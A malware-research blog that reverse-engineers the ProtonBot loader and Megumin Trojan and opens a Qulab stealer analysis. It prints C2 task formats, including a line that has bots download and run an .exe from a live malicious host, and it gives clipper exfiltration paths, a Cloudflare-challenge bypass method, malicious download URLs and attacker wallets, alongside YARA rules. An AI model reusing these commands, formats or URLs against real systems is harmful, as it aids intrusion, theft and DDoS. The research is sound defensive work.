Next, no matter the scenario, the loader is forcing the persistence with a scheduled task trick. Multiple obfuscated blocs are following a scheme to generating the request until itโs finally achieved and executed with a simple ShellExecuteA call.
With a persistence finally integrated, now the comparison between values that I showed on registers will diverge into two directions :
If paths are different
- Making an HTTP Request on โhttp://iplogger.org/1i237a” for grabbing the Bot IP
- Creating a folder & copying the payload with an unusualย wayย that I will explain later.
- Executing proton bot again in the correct folder with CreateProcessA
- Exiting the current module
if paths are identical
- two threads are created for specific purposes
- one for the loader
- the other for the clipper
- At that point, all interactions between the bot and the C&C will always be starting with this format :
/page.php?id=%GUID%
%GUID% is, in fact, the Machine GUID, so on a real scenario, this could be in an example this value โfdff340f-c526-4b55-b1d1-60732104b942โ.
Summary
- Mutex
dsks102d8h911s29
- Loader Path
%APPDATA%/NvidiaAdapter
- Loader Folder
- Schedule Task
- Process
A unique way to perform data interaction
This loader has an odd and unorthodox way to manipulate the data access and storage by using the Windows KTM library. This is way more different than most of the malware that is usually using easier ways for performing tasks like creating a folder or a file by the help of theย FileAPI module.
The idea here, it is permitting a way to perform actions on data with the guarantee that there is not even a single error during the operation. For this level of reliability and integrity, the Kernel Transaction Manager (KTM) comes into play with the help of the Transaction NTFS (TxF).
For those who arenโt familiar with this, there is an example here :
- CreateTransaction is called for starting the transaction process
- The requested task is now called
- If everything is good, the Transaction is finalized with a commit (CommitTransaction) and confirming the operation is a success
- If a single thing failed (even 1 among 10000 tasks), the transaction is rolled back with RollbackTransaction
In the end, this is the task list used by ProtonBot are:
This different way to interact with the Operating System is a nice way to escape some API monitoring or avoiding triggers from sandboxes & specialized software. Itโs a matter time now to hotfix and adjusts this behavior for having better results.
The API used has been also used for another technique with analysis of the banking malwareย Osirisย byย @hasherezade
Anti-Analysis
There are three main things exploited here:
- Stack String
- Xor encryption
- Xor key adjusted with a NOT operand
By guessing right here, with the utilization of stack strings, the main ideas are just to create some obfuscation into the code, generating a huge amount of blocks during disassembling/debugging to slow down the analysis. This is somewhat, the same kind of behavior that Predator the thief is abusing above v3 version.
The screenshot as above is an example among others in this malware about techniques presented and there is nothing new to explain in depth right here, these have been mentioned multiple times and I would say with humor that C++ itself is some kind of Anti-Analysis, that is enough to take some aspirin.
Loader Architecture
The loader is divided into 5 main sections :
- Performing C&C request for adding the Bot or asking a task.
- Receiving results from C&C
- Analyzing OpCode and executing to the corresponding task
- Sending a request to the C&C to indicate that the task has been accomplished
- Repeat the process [GOTO 1]
C&C requests
Former loader request
Path base
/page.php
Required arguments
Argument | Meaning | API Call / Miscellaneous |
---|---|---|
id | Bot ID | RegQueryValueExA โ MachineGUID |
os | Operating System | RegQueryValueExA โ ProductName |
pv | Account Privilege | Hardcoded string โ โAdminโ |
a | Antivirus | Hardcoded string โ โNot Supportedโ |
cp | CPU | Cpuidย (Very similar code) |
gp | GPU | EnumDisplayDevicesA |
ip | IP | GetModuleFileName (Yup, itโs weird) |
name | Username | RegQueryValueExA โ RegisteredOwner |
ver | Loader version | Hardcoded string โ โ1.0 Releaseโ |
lr | ??? | Hardcoded string โ โComing Soonโ |
Additional fields when a task is completed
Argument | Meaning | API Call / Miscellaneous |
---|---|---|
op | OpCode | Integer |
td | Task ID | Integer |
Task format
The task format is really simple and is presented as a simple structure like this.
Task Name;Task ID;Opcode;Value
Tasks OpCodes
When receiving the task, the OpCode is an integer value that permits to reach the specified task. At that time I have count 12 possible features behind the OpCode, some of them are almost identical and just a small tweak permits to differentiate them.
OpCode | Feature |
---|---|
1 | Loader |
2 | Self-Destruct |
3 | Self-Renewal |
4 | Execute Batch script |
5 | Execute VB script |
6 | Execute HTML code |
7 | Execute Powershell script |
8 | Download & Save new wallpaper |
9 | ??? |
10 | ??? |
11 | ??? |
12 (Supposed) | DDoS |
For those who want to see how the loader part looks like on a disassembler, itโs quite pleasant (sarcastic)
the joy of C++
Loader main task
The loader task is set to the OpCode 1. in real scenario this could remain at this one :
newtask;112;1;http://187.ip-54-36-162.eu/uploads/me0zam1czo.exe
This is simplest but accurate to do the task
- Setup the downloaded directory on %TEMP% with GetTempPathA
- Remove footprints from cacheย DeleteUrlCacheEntryA
- Download the payload โ URLDownloadToFileA
- Set Attributes to the file by using transactions
- Execute the Payload โ ShellExecuteA
Other features
Clipper
Clipper fundamentals are always the same and at that point now, Iโm mostly interested in how the developer decided to organize this task. On this case, this is simplest but enough to performs accurately some stuff.
The first main thing to report about it, it that the wallets and respective regular expressions for detecting them are not hardcoded into the source code and needs to perform an HTTP request only once on the C&C for setting-up this :
/page.php?id=%GUID%&clip=get
The response is a consolidated list of a homemade structure that contains the configuration decided by the attacker. The format is represented like this:
[ id, # ID on C&C name, # ID Name (i.e: Bitcoin) regex, # Regular Expression for catching the Wallet attackerWallet # Switching victim wallet with this one ]
At first, I thought, there is a request to the C&C when the clipper triggered a matched regular expression, but itโs not the case here.
On this case, the attacker has decided to target some wallets:
- Bitcoin
- Dash
- Litecoin
- Zcash
- Ethereum
- DogeCoin
ifย you want an in-depth analysis of a clipper task, I recommend you to check my other articles that mentioned in details this (Megumin & Qulab).
DDos
Proton has an implemented layer 4 DDoS Attack, by performing spreading the server TCP sockets requests with a specified port using WinSocks
Executing scripts
The loader is also configured to launch scripts, this technique is usually spotted and shared by researchers on Twitter with a bunch of raw Pastebin links downloaded and adjusted to be able to work.
- Deobfuscating the selected format (.bat on this case)
- Download the script on %TEMP%
- Change type of the downloaded script
- Execute the script with ShellExecuteA
Available formats are .bat, .vbs, .ps1, .html
Wallpaper
There is a possibility to change the wallpaper of bot, by sending the OpCode 8 with an indicated following image to download. The scenario remains the same from the loader main task, with the exception of a different API call at the end
- Setup the downloaded directory on %TEMP% with GetTempPathA
- Remove footprints from cacheย DeleteUrlCacheEntryA
- Download the image โ URLDownloadToFileA
- Change the wallpaper with SystemParametersInfosA
On this case the structure will be like this :
BOOL SystemParametersInfoA ( UINT uiAction -> 0x0014 (SPI_SETDESKWALLPAPER) UINT uiParam -> 0 PVOID pvParam -> %ImagePath% UINT fWinIni -> 1 );
I canโt understand clearly the utility on my side but surely has been developed for a reason. Maybe in the future, I will have the explanation or if you have an idea, let me share your thought about it
Example in the wild
A few days ago, a ProtonBot C&C (187.ip-54-36-162.eu) was quite noisy to spread malware with a list of compatibilized 5000 bots. Itโs enough to suggest that it is used by some business already started with this one.
Notable malware hosted and/or pushed by this Proton Bot
- Qulab
- ProtonBot
- CoinMiners
- C# RATs
There is also another thing to notice, is that the domain itself was also hosting other payloads not linked to the loader directly and one sample was also spotted on another domain & loader service (Prostoloader). Itโs common nowadays to see threat actors paying multiple services, to spread their payloads for maximizing profits.
All of them are accessible on the malware tracker.
[*] Yellow means duplicate hashes in the database.
IoC
Proton Bot
- 187.ip-54-36-162.eu/cmdd.exe
- 9af4eaa0142de8951b232b790f6b8a824103ec68de703b3616c3789d70a5616f
Payloads from Proton Bot C2
Urls
- 187.ip-54-36-162.eu/uploads/0et5opyrs1.exe
- 187.ip-54-36-162.eu/uploads/878gzwvyd6.exe
- 187.ip-54-36-162.eu/uploads/8yxt7fd01z.exe
- 187.ip-54-36-162.eu/uploads/9xj0yw51k5.exe
- 187.ip-54-36-162.eu/uploads/lc9rsy6kjj.exe
- 187.ip-54-36-162.eu/uploads/m3gc4bkhag.exe
- 187.ip-54-36-162.eu/uploads/me0zam1czo.exe
- 187.ip-54-36-162.eu/uploads/Project1.exe
- 187.ip-54-36-162.eu/uploads/qisny26ct9.exe
- 187.ip-54-36-162.eu/uploads/r5qixa9mab.exe
- 187.ip-54-36-162.eu/uploads/rov08vxcqg.exe
- 187.ip-54-36-162.eu/uploads/ud1lhw2cof.exe
- 187.ip-54-36-162.eu/uploads/v6z98xkf8w.exe
- 187.ip-54-36-162.eu/uploads/vww6bixc3p.exe
- 187.ip-54-36-162.eu/uploads/w1qpe0tkat.exe
Hashes
- 349c036cbe5b965dd6ec94ab2c31a3572ec031eba5ea9b52de3d229abc8cf0d1
- 42c25d523e4402f7c188222faba134c5eea255e666ecf904559be399a9a9830e
- 5de740006b3f3afc907161930a17c25eb7620df54cff55f8d1ade97f1e4cb8f9
- 6a51154c6b38f5d1d5dd729d0060fa4fe0d37f2999cb3c4830d45d5ac70b4491
- 77a35c9de663771eb2aef97eb8ddc3275fa206b5fd9256acd2ade643d8afabab
- 7d2ccf66e80c45f4a17ef4ac0355f5b40f1d8c2d24cb57a930e3dd5d35bf52b0
- aeab96a01e02519b5fac0bc3e9e2b1fb3a00314f33518d8c962473938d48c01a
- ba2b781272f88634ba72262d32ac1b6f953cb14ccc37dc3bfb48dcef76389814
- bb68cd1d7a71744d95b0bee1b371f959b84fa25d2139493dc15650f46b62336c
- c2a3d13c9cba5e953ac83c6c3fe6fd74018d395be0311493fdd28f3bab2616d9
- cbb8e8624c945751736f63fa1118032c47ec4b99a6dd03453db880a0ffd1893f
- cd5bffc6c2b84329dbf1d20787b920e5adcf766e98cea16f2d87cd45933be856
- d3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf
- d3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf
- e1d8a09c66496e5b520950a9bd5d3a238c33c2de8089703084fcf4896c4149f0
Domains
- 187.ip-54-36-162.eu
PDB
- E:\PROTON\Release\build.pdb
Wallets
- 3HAQSB4X385HTyYeAPe3BZK9yJsddmDx6A
- XbQXtXndTXZkDfb7KD6TcHB59uGCitNSLz
- LTwSJ4zE56vZhhFcYvpzmWZRSQBE7oMSUQ
- t1bChFvRuKvwxFDkkm6r4xiASBiBBZ24L6h
- 1Da45bJx1kLL6G6Pud2uRu1RDCRAX3ZmAN
- 0xf7dd0fc161361363d79a3a450a2844f2a70907c6
- D917yfzSoe7j2es8L3iDd3sRRxRtv7NWk8
Threat Actor
- Glad0ff (Main)
- ProtonSellet (Seller)
Yara
rule ProtonBot : ProtonBot {
meta:
description = โDetecting ProtonBot v1โ
author = โFumik0_โ
date = โ2019-05-24โ
strings:
$mz = {4D 5A}
$s1 = โproton botโ wide ascii
$s2 = โBuild.pdbโ wide ascii
$s3 = โktmw32.dllโ wide ascii
$s4 = โjson.hppโ wide ascii
condition:
$mz at 0 and (all of ($s*))
}
Conclusion
Young malware means fresh content and with time and luck, could impact the malware landscape. This loader is cheap and will probably draw attention to some customers (or even already the case), to have less cost to maximize profits during attacks. ProtonBot is not a sophisticated malware but itโs doing its job with extra modules for probably being more attractive. Letโs see with the time how this one will evolve, but by seeing some kind of odd cases with plenty of different malware pushed by this one, that could be a scenario among others that we could see in the future.
On my side, itโs time to chill a little.
Special Thanks โ S!ri & Snemes
Letโs nuke Megumin Trojan
When you are a big fan of the Konosuba franchise, you are a bit curious when you spot a malware called โMegumin Trojanโ (Written in C++) on some selling forums and into some results of sandbox submissions. Before some speculation about when this malware has appeared, this one is not recent and there are some elements that prove it was present on the market since the beginning of 2018.
Since the last days, there is an increased activity related to a new version that was probably launched not so long ago (a v2), and community started to talk about it, but a lot of them has misinterpretation with Vidar due to the utilization of the same boundary beacon string. This analysis will help you to definitely clarify how to spot and understand how Megumin Trojan is working and it definitely has a specific signature, that you canโt miss it with you dig on it (for both network activities & code).
This malware is a Trojan who has a bunch of features:
- DDoS
- Miner
- Clipper
- Loader
- Executing DOS commands on bots
- Uploading specific files from bots to C&C
Itโs time to reverse a little all of that
Anti-Analysis Techniques
The classy PEB
This malware is using one of the classiest tricks for detecting that the process is currently debugged, by checking a specific field into theย Process Environment Block (PEB). For those who are unfamiliar with this, itโs a structure that contains all process information.
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; // HERE ...< Other fields >... PVOID Reserved12[1]; ULONG SessionId; } PEB, *PPEB;
For our case, the value โBeingDebuggedโ will be โobviouslyโ checked. But how it looks like when reversing it? Here itโs looking like this.
- fs:[18] is where is located the Thread Environment Process (TEB)
- ds:[eax+30] is necessary to have access into the PEB, that is part of the TEB.
- ds[eax+2] remains to retrieve the value TEB.PEB.BeingDebugged
This one has been used multiple times during the execution process of Megumin Trojan.
Window Title
This other trick used here is to get the title of the program and comparing it with a list of strings. For achieving it, the malware is calling GetForegroundWindow at first for the Windows of the current process and then grabbing the title with the help of GetWindowTextA.
The comparison with the string is done step by step, by decrypting first the XOR string and comparing it with the Window Title, and continuing the functions until every value is checked.
The completed string list :
- OllyDbg
- IDA
- ImmunityDebugger
- inDb (Remain to WinDbg)
- LordP (Remains to LordPE)
- iresharkย (Remains to Wireshark)
- HTTP Analyzer
This technique here is not able to work completely because itโs checking the Windows Title of the current process used and so, some strings wonโt be able to work at all. When I was reversing it, I didnโt understand at all why it was done like this, maybe something that was done fast or another unrelated explanation and we will never know.
Dynamic Process Blacklist
When the malware is fully configured, it performs anย HTTP POST request called /blacklist. The answer contains a list of processes that the attacker wants to kill whenever the payload is active, the content is encoded in base64 format.
When processes are flagged as blacklisted, those are stored into variables as Process Handles, and they are checked and killed by a simple comparison. For terminating them theย ZwTerminateProcess (or NtTerminateProcess if you are looking on a disassembler) API call is used and after the accomplishment of the task, the value on memory is initialized again to -1 for continuing, again and again, to maintain that these processes will never be able to be active whenever the malware is up.
By default, all values are set to -1 (0xFFFFFFFF)
Network interactions list
Megumin is quite noisy, in term of interactions between bots and the C&C, and the amount of API request is more than usual compared to the other malwares that I haveย analyzed. So to make as much as possible simple and understandable, I classified them into three categories.
General commands
/suicide | Killing request |
/config | Malware config |
/msgbox | Fake message prompt window |
/isClipper | is Clipper activated |
/isUSB | Is set up to spread itself on removable drives |
/blacklist | Process blacklist |
/wallets | Wallet config for the clipper part |
/selfDel | Removing the payload of the original PE |
Bot commands
/addbot?hwid= | Add a new bot to the C&C (*) |
/task?hwid= | Ask for a task |
/completed?hwid= | Tell the C&C that task has been done |
/gate?hwid= | Gate for uploading/stealing specific files from bot to C&C |
/reconnecttime | Amount of time for next request between bot and C&C |
(*) Only when the User-Agent is strictly configured as โMegumin/2.0โ
Miner commands
/cpu | CPU Miner configuration |
/gpuAMD | GPU AMD Miner Configuration |
/gpuNVIDIA | GPU NVIDIA Miner Configuration |
As a reminder, all response from the server are encoded in base64 with the only exception of the /config one, which is in clear.
Curiosity: This malware is also using the same boundary beacon as Vidar and some other malware.
That โmessyโ setup
This trojan is quite curious about how itโs deploying itself and the first time I was trying to understand the mess, I was like, seriously what the heck is wrong with the logic of this malware. After that, I thought it was just the only thing weird with megumin, but no. To complexify theย setup, interactions with the C&C are different between different stages.
For explaining everything, I decided to split it into multiple steps, to slowly understand the chronological order of it.
Step 1
- In the first request, the malware is downloading a payload named โreserv.exeโ. if this file is not empty it means the current payload is not the main build of the malware. reserv.exe is downloaded and saved into a specific folder hidden in %PROGRAMDATA% as โ{MACHINE_GUID}โ (for example {656a1cdc-0ae0-40d0-a8bb-fdbd603c3b13}),this file at the end is renamed as โupdate.exeโ.
- Then two or three requests are performed
- /suicide
- /msgbox
- /selfDel (optional)
- A scheduled task is created with this specific pattern for the persistence, the name of the payload will be โupdate.exeโ and another one on the registry.
- โScheduled Updater โ {*MACHINE_GUID*}โ
- Then the payload is killed and removed
Reminder: If the malware was not fast enough to download reserv.exe for whatever reasons, it is named by a random windows process name, and will continue the process over and over until it will grab reserv.exe
Curiosity: The way this malware is creating a folder into PROGRAMDATA is strictly the same way as Arkei, Baldr,ย Rarog & Supreme++ย (Rarog fork).
Megumin
Arkei
Rarog
Step 2
- reserv.exe is again downloaded, and considering the file is empty, so at that time, the correct build for communicating with the C&C.
- Those requests are performed
- /suicide
- /msgBox
- /config
The config is the only request was the server is not encoding it in base64 format, there are 4 options possible.
Option 1 | USB task (Spreading the build on removable drives) |
Option 2 | Clipper |
Option 3 | ??? |
Option 4 | ??? |
- A scheduled task is created with this specific pattern for the persistence and the name of the payload is at that time a random known legitimate windows process (also same thing on the registry).
- โScheduled Updater โ {*MACHINE_GUID*}โ
- Then the payload is killed and removed
If this file is empty, itโs considered that it reached its final destination and its final C&C, so seeing two Megumin C&C on the same domain could be explainable by this (and It was the case on my side).
Step 3
- reserv.exe is always checked for checking if there is a new build
- Now the behavior on the network flows is totally new. The bot is now way more talkative and is going to be fully set up and registered to the C&C.
- /suicide
- /config
- /addbot?hwid=โฆ&โฆ.. # Registration
- /blacklist
- /wallets
- /task?hwid=โฆ # Performs a task
- โฆ a lot of possible tasks (explained below)
- /completed?hwid=โฆ # Alerting that the task is done
- /reconnecttime
For the addbot part, the registration is requiring specific fields that will be all encoded in base64 format.
- Machine GUID
- Platform
- Windows version
- CPU Name
- GPU Name
- Antivirus
- Filename (name of the megumin payload)
- Username
example of request (Any.Run)
Step 4
- reserv.exe is always checked for checking if there is a new build
- If the bot is run after the registration, it will be possible to have this pattern of request
- /suicide
- /config
- /task?hwid=โฆ # Performs task
- โฆ a lot of possible tasks (explained below)
- /completed?hwid=โฆ # Alerting that the task is done
- /reconnecttime
Fake messages
As shown above, the malware has also a feature to prompt a fake window and this could be used for making โsome realistic scenarioโ of a typical fake software, crack or other crapware, lure the user during the execution that the software has been installed or there is an error during the false installation or execution. Itโs really common to see nowadays fake prompt window for missing runtime DLL, or fake Fortnite hack or whatever Free Bitcoin trap generator, this kind of lure will always work in some kind of people, even more with kids.
For configuring the feature, the bot is sending a specific HTTP POST Request named โ/msgboxโ and After decoding the base64 response from the server the response is split into multiple variables :
- An integer value that will represent the Icon of the Window
- A second int value that will represent the buttons that will be used
- The caption (Title)
- The text that will be printed on the prompt window
Corresponding case input codes with the configuration of the prompt window are classified below:
uType โ Uint Code โ Icons โ cases
Case Code | Value | Meaning |
1 | 0x00000020L | Question-mark message box |
2 | 0x00000030L | Information message box |
3 | 0x00000040L | Warning message box |
uType โ Uint Code โ Buttons โ cases
Case Code | Value | Meaning |
0 | 0x00000002L | Abort, Retry & Ignore buttons |
1 | 0x00000006L | Cancer, Try Again, Continue buttons |
2 | 0x00004000L | Help button |
3 | 0x00000000L | OK button |
4 | 0x00000001L | OK & Cancel buttons |
5 | 0x00000005L | Retry & Cancel buttons |
6 | 0x00000004L | Yes & No buttons |
7 | 0x00000003L | Yes, No & Cancel buttons |
Clipper
Before that the malware is executing the main module, all the regexes that will be used for catching the whished data are stored dynamically into memory.
Then when the malware is fully installed if the clipping feature is activated by the config request, another one called โ/walletโ is performed. This command gives to the bot the list of all wallet configured to be clipped. the content is base64 encoded.
At this point,ย the classy infinite loop like Qulab is performed and will remain the same until the program is killed or crashed.
- The content of the clipboard is stored into a variable.
- Step by step, all regexes are checking if it matches with the clipboard.
- If one regex triggers something, the content on the clipboard is switched by the one that the attacker wants and some data are sent to the C&C.
/newclip?hwid=XXX&type=XXX©=XXX&paste=XXX&date=XXX
The whole process of the clipper is representing like this.
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
ย
For some investigation, this is the complete list of wallets, softwares, and websites targeted by this malware.
Bitcoin | BitcoinGold | BtcCash | Ethereum |
BlackCoin | ByteCoin | EmerCoin | ReddCoin |
Peercoin | Ripple | Miota | Cardano |
Lisk | Stratis | Waves | Qtum |
Stellar | ViaCoin | Electroneum | Dash |
Doge | LiteCoin | Monero | Graft |
ZCash | Ya.money | Ya.disc | Steam |
vk.cc | QIWI |
Tasks
When the bot is sending a request to the C&C, there is a possibility to have nine different tasks to be performed and they are all presenting like this.
<name>|<command>|...
There are currently 3 main fields for the tasks.
- DDoS
- Executing files
- Miscellaneous
Whenever a task is accomplished, the request โ/completed?hwid=โ is sent to the C&C. The reason for this is simple, tasks can be counted and when it reaches a specific amount, the task is simply deactivated.
Letโs reviewing them!
DDoS
Socket HTTP
Task format
socket|time|threads|link
When there is a necessity to create threads for performing the DDoS tasks, it only grabs the specific fields and using it a length for a thread loop creation as shown below, lpStartAddress will contain the reference of the specific DDoS function that the bot has to do.
When inspecting it the function, we can see the layer 7 DDoS Attack by flooding the server by HTTP GET requests with the help of sockets.
When everything is configured, the send function is called for starting the DDoS.
HTTP
Task format
http|time|threads|link
As explained above, the technique will remain always the same for the thread setup, only the function addressed is different. For the HTTP DDoS task, itโs another Layer 7 DDoS Attack by flooding the server with HTTP requests by using the methods from the Wininet library :
Itโs slower than the โsocketโ tasks, but it used for the case that the server is using 301 redirects.
TCP
Task format
tcp|time|threads|port|link
The TCP task is Layer 4 DDoS Attack, by performing spreading the server TCP sockets requests with a specified port.
JS Bypass
Task format
jsbypass|time|threads|link
When the website is using Cloudflare protection, the malware is also configured to use a known trick to bypass it by creating a clearance cookie for not being able to be challenged anymore.
The idea is when itโs reaching for the first time the Website, a 503 error page will redirecting the attacker into a waiting page (catchable by the string โJust a momentโ as shown above), At this moment Cloudflare is, in fact, sending the challenging request,ย so aย __cfduid cookie is generated and the content of the source code on this page is fetched by the help of a parser implemented in the malware. It needs 3 parameters at least, 2 of them are already available :
jschl_vc | the challenge token |
pass | ??? |
The last field is the jschl_answer, as guessable this is the answer to the challenge asked by Cloudflare. To solve it, an interpreter was also implemented to parse the js code, catching the challenge-form value and a.value field for interpreting correctly the native code with the right setup.
This process shown as below is the interpreter that will analyze block per block the challenge with the help of a loop, the data is shelled and each block will be converted into an integer value, the sum of all of them will give us the jschl_answer value.
so at the end of the waiting page, this request is sent:
/cdn-cgi/l/chk_jschl?jschl_vc=VALUE&pass=VALUE&jschl_answer=VALUE
chk_jschl leads to the cf_clearance cookie creation if the answer to the challenge is correct and this cookie is proof that you are authentic and trusted by Cloudflare, so by keeping it bypasses for the next requests sent, the website will no longer challenging the attacker temporarily.
Miscellaneous curiosities
the default values for DDoS tasks are :
Time | 180 (in seconds) |
Threads | 2500 |
Port | 42 |
Loader
Load
Task format
load|link
Seeing a loader feature is something that a quite common thing by the current trendings, customers that bought malware wants to maximize their investments at all cost. This trojan is also configured to pushed some payloads. There is nothing much to say about this. The only important element, in this case,ย itโs that the loaded payload is stored into the %PROGRAMDATA% folder with the name of {MACHINE_GUID}.exe.
Load PE
Task format
loadpe|link
Contrary to a simple loader feature, this one is typically a process hollowing alternative. Itโs only working with 32 bits payload and using this classy process injection trick into a legitimate process.
For some reasons, the User-Agent โMozilla/5.0 (Windows NT 6.1) Megumin/2.0โ is catchable when itโs downloading the payload on this specific load PE task.
More information about process injections techniquesย here
Update
Task format
update|build_link
When there is an update required with the malware, there is a possibility to push a new build to the bot by using this task.
Miscellaneous tasks
cmd
Task format
cmd|command
One of the miscellaneous tasks possible is the possibility to send some cmd commands on the bot. I donโt have a clue about the necessity of this task, but if itโs implemented, there is a reason for that.
Complete list available here
upload
Task format
upload|fullpath
If the attacker knows exactly what heโs doing, he can steal some really specific files on the bot, by indicating the full path of the required one. The crafted request at the end will be on that form, for pushing it on the C&C.
/gate?hwid=XXX
Miner
The miner is one of the main features of the trojan. Most of the time, When analysts are reversing a miner, this is really easy to spot things and the main ideas are to understand the setup part and how itโs executing the miner software.
At the end for future purposes, I am considering their check-up list as relevant when reversing one:
- Is it targeting CPU, GPU or both?
- If itโs GPU, is Nvidia & AMD targeted?
- Is it generating a JSON config?
- What miner software is/are used
- Are there any Blacklist Country or Specific countries spotted to mine?
- What are the pools addresses?
On this malware, Both hardware type has been implemented, and for checking which miner software is required on the GPU part, it only checking the name of the GPU on the bot, if Nvidia or AMD is spotted on the text, request to the C&C will give the correct setup and miner software.
The base64 downloaded miner config contains two things:
- The link of the miner software
- The one-line config that will be executed with the downloaded payload by the help of ShellExecuteA
For some reasons, the User-Agent โMozilla/5.0 (Windows NT 6.1) Megumin/2.0โ is only catchable when itโs downloading the miner software for the CPU part, not for the GPU.
Server-side
Login Page
The login page is quite fancy, simplest. Even if I could be wrong of with this statement, itโs using the same core template as Supreme++ (Rarog Fork) with some tweaks.
Something interesting to notice with this C&C, that there is no password but a 2FA Google authenticator on the authentication part.
Dashboard
There is not too much to say about the dashboard, its a classy stats page with these elements:
- Top Countries
- New bots infected (weekly)
- Bots Windows Chart
- Number of bots online (weekly)
- Bots CPU chart
- Bots GPU chart
- Platform chart
- AV Stats
- Current cryptocurrencies values
- Top stolen wallet by the clipper
Bots
- Bots โ Current list of bots
- Tasks โ Task creation & current task list
- Files โ All files that have been uploaded to the C&C with the help of the task โuploadโ
Task setup
Tasks that Iโve detailed above are representing like this on the C&C, as usual, itโs designed to be user-friendly for customers, they just want to configure fast and easily their stuff to be able to steal & being profitable quickly as possible.
When selected, there is a usual configuration setup for the task, with classy fields like :
- Task Name
- Max Executions routine
- If the Task must be designed for targeting only one bot
- And an interesting advanced setting tab
If we look at it, the advanced setting is where the C&C could targeting bots by :
- Specific hardware requirements
- Platform
- Countries
Countries can be easily catchable on the Victim machine by checking the Locale of the Keyboard (I have already explained this tick on Vidar) and the IP.
So it means that malware could be designed to target highly specific areas.
When the task is completed, its represented like this.
ย
Clips
Settings
Bots
- โUSB Spreadingโ remains to /isUSB API request
- โDel exe after startโ remains to /selfDel API request
Clipper
Clipper is quite simple, itโs just the configuration of all wallet that will be clipped.
Miner
The miner tab is quite classy also, just a basic configuration of the config and where it will download the payload.
As usual, the process blacklist will remain the same as we saw in other miner malware. Some google search will be sufficient to know which processes are the most targeted.
MessageBox
A fancy message box configuration part with multiple possibilities.
Countries
Itโs also possible to ban bots from specific countries, on the side bot side, the malware will check if the country is valid or not with the help of the IP and the Keyboard Language configuration.
On the code, itโs easily traceable by these checks, for more explanation about how it works for the keyboard part, this is already detailed on the Vidar paper.
Panel
For some reasons, there is also a possibility to change the username for the panel authentication, by doing this the 2FA Google Authenticator is required for confirming this.
Script
For further investigation about this v2, I developed a small script called โohanaโ, like the Vidar one to extract the configuration of each sample and itโs already available on my GitHub repository.
IoCs
Hashes
- d15e1bc9096810fb4c954e5487d5a54f8c743cfd36ed0639a0b4cb044e04339f
- e6c447c826ae810dec6059c797aa04474dd27f84e37e61b650158449b5229469
- c70120ee9dd25640049fa2d08a76165948491e4cf236ec5ff204e927a0b14918
- d431e6f0d3851bbc5a956c5ca98ae43c3a99109b5832b5ac458b8def984357b8
- ed65610f2685f2b8c765ee2968c37dfce286ddcc31029ee6091c89505f341b97
- 89813ebf2da34d52c1b924b408d0b46d1188b38f035d22fab26b852ad6a6fc19
- 8777749af37a2fd290aad42eb87110d1ab7ccff4baa88bd130442f25578f3fe1
Domains
- 90551.prohoster.biz
- baldorclip.icu
- santaluisa.top
- megumin.top
- megumin.world
PDB
- C:\Users\Ddani\source\repos\MeguminV2\Release\MeguminV2.pdb
- C:\Users\Administrator\Desktop\MeguminV2\Release\MeguminV2.pdb
Threat Actors
- Danij (Main)
- Moongod
MITRE ATT&CK
- Execution โ Command-Line Interface
- Execution โ Schedule Task
- Persistence โ Schedule Task
- Persistence โ Registry Run Keys / Startup Folder
- Defense โ File Deletion
- Defense โ Hidden Files & Directories
- Defense โ Process Hollowing
- Privilege Escalation โ Schedule Task
- Credential Access โ Credentials in File
- Collection โ Clipboard Data
Yara
rule Megumin : Megumin { meta: description = "Detecting Megumin v2" author = "Fumik0_" date = "2019-05-02" strings: $mz = {4D 5A} $s1 = "Megumin/2.0" wide ascii $s2 = "/cpu" wide ascii $s3 = "/task?hwid=" wide ascii $s4 = "/gate?hwid=" wide ascii $s5 = "/suicide" wide ascii condition: $mz at 0 and (all of ($s*)) }
Conclusion
Megumin Trojan is not a complicated malware but about all the one that I have reversed, this is the most talkative one that Iโve analyzed and possesses a quite some amount of tasks. Letโs see with the time how this one will evolve, but itโs confirmed at that time, there is currently a lot of interesting stuff to do with this one :
- in term of analysis
- in term of cybercrime investigation
#HappyHunting
#WeebMalware
Special Thanks: S!Ri
Photo byย Jens Johnssonย onย Unsplash
Letโs play with Qulab, an exotic malware developed in AutoIT
After some issues that kept me far away from my researches, itโs time to put my hands again on some sympathetic stuff. This one is technically and finally my real first post of the year (The anti-VM one was a particular case).
So today, we will dig into Qulab Stealer + Clipper, another password-stealer that had my attention to be (on my point view) an exotic one, because it is fully developed in AutoIT and have a really cool obfuscation technique that occupied me for some times. Trends to have malware that is coded in some languages different than C, C++, .NET or Delphi is not new, there is a perfect case with the article made by Hasherezadeย earlier this year for a stealer developed in GoLang (that I highly recommend taking a look on it).
Normally, using AutoIT scripts in that area is pretty common. Itโs widely used as a packer for hiding detection or as a node into an infection chain, but as a whole password-stealer, itโs not the same. I could say itโs a particular case because itโs resale with support on the black market.
Even if as usual, techniques remains the same for the stealing features, itโs always entertaining to see how there is plenty of ways to achieve one simple goal. Also, the versatility on this one is what makes me overwhelmed my curiosity and burning all my sleep time for some reasonsโฆ
Qulab is focusing on these features:
- Browser stealing
- Wallet Clipper
- FTP creds
- Discord / Telegram logs
- Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
- Telegram Bot through a proxy
- Grabber
Auto IT?
As I mentioned in the intro, Qulab is coded in AutoIT, for people that are really not in touch it or have no idea about it, it is an automation language who has a syntax similar to the BASIC structure, itโs designed to work only on Microsoft Windows.
They are two way to execute AutoIT scripts :
- If the script is run with the .au3 format, AutoIT dependances are required and all the libraries that are necessary to run it.
- If the script is compiled all the libraries are added into it for avoiding dependances. It means that you donโt need to install AutoIT for executing PE.
When the instructions are compiled into an executable file, itโs easy to catch if we are analyzing an AutoIT script by a simply checking some strings, so there already some Yara rules that made the task to confirm that is the case.
